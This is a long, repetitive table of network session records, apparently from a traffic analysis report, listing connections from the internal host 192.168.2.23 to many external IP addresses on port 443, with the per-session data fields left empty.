                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11493192.168.2.2333604213.35.44.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11494192.168.2.2352042194.73.213.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11495192.168.2.235791424.121.245.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11496192.168.2.2355098179.9.182.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11497192.168.2.2340652164.104.245.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11498192.168.2.234575079.187.72.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11499192.168.2.234016698.128.34.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11500192.168.2.2356136204.155.254.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11501192.168.2.2351546145.103.69.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11502192.168.2.234576441.200.229.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11503192.168.2.2353184196.62.239.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11504192.168.2.2333944154.51.17.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11505192.168.2.234555432.211.32.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11506192.168.2.2350420170.197.113.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11507192.168.2.234787853.126.230.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11508192.168.2.2340622189.160.118.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11509192.168.2.2355622197.177.213.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11510192.168.2.234181899.74.17.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11511192.168.2.2356542133.195.132.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11512192.168.2.2335104106.64.207.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11513192.168.2.234505850.169.125.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11514192.168.2.2356020168.140.5.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11515192.168.2.2351058211.238.146.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11516192.168.2.23344162.69.194.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11517192.168.2.2335112193.24.111.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11518192.168.2.2333114176.72.208.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11519192.168.2.235180680.172.28.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11520192.168.2.2337518119.217.82.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11521192.168.2.235034681.216.161.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11522192.168.2.235360234.155.95.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11523192.168.2.2353090208.116.198.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11524192.168.2.2347334159.133.160.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11525192.168.2.235038245.12.9.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11526192.168.2.233359461.11.241.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11527192.168.2.2351044104.227.179.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11528192.168.2.2343566164.208.98.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11529192.168.2.2360326137.128.47.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11530192.168.2.2347442155.93.203.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11531192.168.2.2339834135.25.80.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11532192.168.2.235038090.3.17.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11533192.168.2.235369844.49.209.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11534192.168.2.234773876.219.184.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11535192.168.2.233776492.198.211.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11536192.168.2.2344406113.242.174.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11537192.168.2.2353576148.221.8.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11538192.168.2.233828479.26.227.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11539192.168.2.2358950199.113.63.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11540192.168.2.2333892151.224.251.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11541192.168.2.2343816104.251.166.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11542192.168.2.2337600164.82.206.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11543192.168.2.235993823.244.9.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11544192.168.2.2347236102.242.74.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11545192.168.2.2353388213.105.99.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11546192.168.2.233323684.46.225.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11547192.168.2.233366869.96.94.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11548192.168.2.235890837.203.1.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11549192.168.2.235725250.213.41.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11550192.168.2.23427381.254.51.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11551192.168.2.23601905.186.64.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11552192.168.2.235433873.180.167.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11553192.168.2.2336970212.201.73.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11554192.168.2.2342134188.204.68.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11555192.168.2.235504078.50.136.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11556192.168.2.234986896.12.78.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11557192.168.2.234964686.123.223.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11558192.168.2.2341714210.30.141.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11559192.168.2.233873453.211.231.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11560192.168.2.2338616179.169.158.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11561192.168.2.2335044220.13.118.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11562192.168.2.2360938219.41.213.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11563192.168.2.2335532209.130.64.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11564192.168.2.2359852111.226.116.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11565192.168.2.234041424.253.45.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11566192.168.2.235319436.237.63.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11567192.168.2.2336732145.210.200.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11568192.168.2.233785685.149.249.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11569192.168.2.233450445.210.37.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11570192.168.2.233634023.64.218.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11571192.168.2.2358938165.73.76.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11572192.168.2.2336678170.225.253.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11573192.168.2.233707240.221.52.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11574192.168.2.234479427.14.18.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11575192.168.2.2342200113.29.66.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11576192.168.2.235225818.176.111.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11577192.168.2.2352828116.80.222.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11578192.168.2.2341504213.211.51.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11579192.168.2.235348413.112.166.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11580192.168.2.2348594172.169.43.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11581192.168.2.2360748131.222.6.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11582192.168.2.235047883.82.103.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11583192.168.2.2336002219.197.76.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11584192.168.2.233314670.156.201.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11585192.168.2.233358231.34.239.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11586192.168.2.2345744126.166.62.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11587192.168.2.235126496.59.154.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11588192.168.2.2340390201.198.35.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11589192.168.2.2339946167.63.167.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11590192.168.2.2343788176.249.148.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11591192.168.2.235030623.218.150.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11592192.168.2.2353638221.61.146.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11593192.168.2.233565474.248.156.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11594192.168.2.233374869.7.68.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11595192.168.2.235280819.237.228.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11596192.168.2.2349008117.188.122.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11597192.168.2.235652236.61.70.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11598192.168.2.2350216186.73.143.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11599192.168.2.2339020166.6.119.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11600192.168.2.2347724202.207.62.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11601192.168.2.234784840.45.187.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11602192.168.2.2339654217.44.152.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11603192.168.2.2353842217.37.167.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11604192.168.2.2354842102.241.100.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11605192.168.2.2337114155.131.146.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11606192.168.2.233789875.253.115.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11607192.168.2.23349624.136.128.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11608192.168.2.2346628132.75.62.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11609192.168.2.235115273.147.17.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11610192.168.2.2345384101.110.165.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11611192.168.2.2360836148.142.144.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11612192.168.2.235032292.173.155.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11613192.168.2.2347392123.253.204.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11614192.168.2.2353128182.227.213.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11615192.168.2.2354254166.57.2.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11616192.168.2.2351098163.88.228.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11617192.168.2.2338400198.164.224.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11618192.168.2.2352646114.184.21.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11619192.168.2.23590142.182.122.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11620192.168.2.2355984116.103.212.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11621192.168.2.2360330103.86.250.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11622192.168.2.234384217.249.166.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11623192.168.2.2349452130.119.234.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11624192.168.2.2339664190.118.167.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11625192.168.2.2334036162.54.228.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11626192.168.2.2353404137.200.57.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11627192.168.2.234057246.172.87.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11628192.168.2.2339048219.191.217.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11629192.168.2.2349306101.166.84.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11630192.168.2.2342680115.166.252.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11631192.168.2.235279090.78.14.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11632192.168.2.234039051.28.213.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11633192.168.2.236026282.36.140.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11634192.168.2.2339342153.4.164.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11635192.168.2.234339065.196.53.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11636192.168.2.2355530219.105.204.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11637192.168.2.2339404211.34.169.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11638192.168.2.235809087.158.245.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11639192.168.2.2352496178.39.13.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11640192.168.2.2333496206.180.174.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11641192.168.2.2344950132.66.115.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11642192.168.2.2343194118.48.244.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11643192.168.2.235031639.128.205.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11644192.168.2.235285446.53.255.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11645192.168.2.2335900133.234.141.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11646192.168.2.2341186109.133.65.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11647192.168.2.2358602141.229.166.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11648192.168.2.2349308179.74.93.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11649192.168.2.2333956110.9.66.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11650192.168.2.2340914126.21.99.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11651192.168.2.2358728155.227.51.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11652192.168.2.2333426117.164.48.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11653192.168.2.233814814.187.47.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11654192.168.2.233612247.218.153.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11655192.168.2.2341334166.174.82.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11656192.168.2.233421265.95.56.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11657192.168.2.233404492.9.181.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11658192.168.2.2342948186.201.173.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11659192.168.2.2339894125.178.10.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11660192.168.2.234146082.91.194.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11661192.168.2.235131666.220.65.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11662192.168.2.234516845.210.18.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11663192.168.2.234147646.22.242.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11664192.168.2.233387013.24.93.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11665192.168.2.235848434.112.168.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11666192.168.2.2345578105.138.240.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11667192.168.2.2332856131.202.1.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11668192.168.2.235623253.203.104.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11669192.168.2.2333860211.155.195.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11670192.168.2.234700617.231.160.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11671192.168.2.2351438105.99.140.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11672192.168.2.2356980194.185.19.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11673192.168.2.234500095.203.211.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11674192.168.2.2334534138.23.83.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11675192.168.2.2360176169.76.90.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11676192.168.2.2344748223.172.141.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11677192.168.2.2356334104.121.185.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11678192.168.2.2360530193.12.229.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11679192.168.2.235116489.8.107.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11680192.168.2.2344742117.213.137.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11681192.168.2.2346194195.52.52.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11682192.168.2.235784462.242.130.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11683192.168.2.2354044133.218.119.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11684192.168.2.233532249.71.108.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11685192.168.2.2348290162.172.251.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11686192.168.2.2346134171.128.237.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11687192.168.2.2348872150.87.171.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11688192.168.2.2355124141.246.147.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11689192.168.2.2335184212.245.239.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11690192.168.2.2348902104.78.30.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11691192.168.2.233826052.38.127.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11692192.168.2.2334416216.241.252.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11693192.168.2.235301262.209.101.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11694192.168.2.2333440135.70.24.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11695192.168.2.2332910104.118.19.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11696192.168.2.233857245.140.197.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11697192.168.2.2343374186.218.23.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11698192.168.2.2349442155.231.112.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11699192.168.2.234639814.154.238.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11700192.168.2.2350946161.99.10.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11701192.168.2.23569968.165.102.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11702192.168.2.2360156196.33.252.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11703192.168.2.2349222146.175.232.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11704192.168.2.2347880182.90.193.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11705192.168.2.2358928222.42.1.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11706192.168.2.235761020.109.73.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11707192.168.2.2358840217.224.31.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11708192.168.2.235355898.64.85.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11709192.168.2.2343672216.206.53.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11710192.168.2.234409844.220.157.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11711192.168.2.235406460.104.220.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11712192.168.2.2338386193.32.80.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11713192.168.2.2350588212.70.132.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11714192.168.2.2358298173.214.155.99443
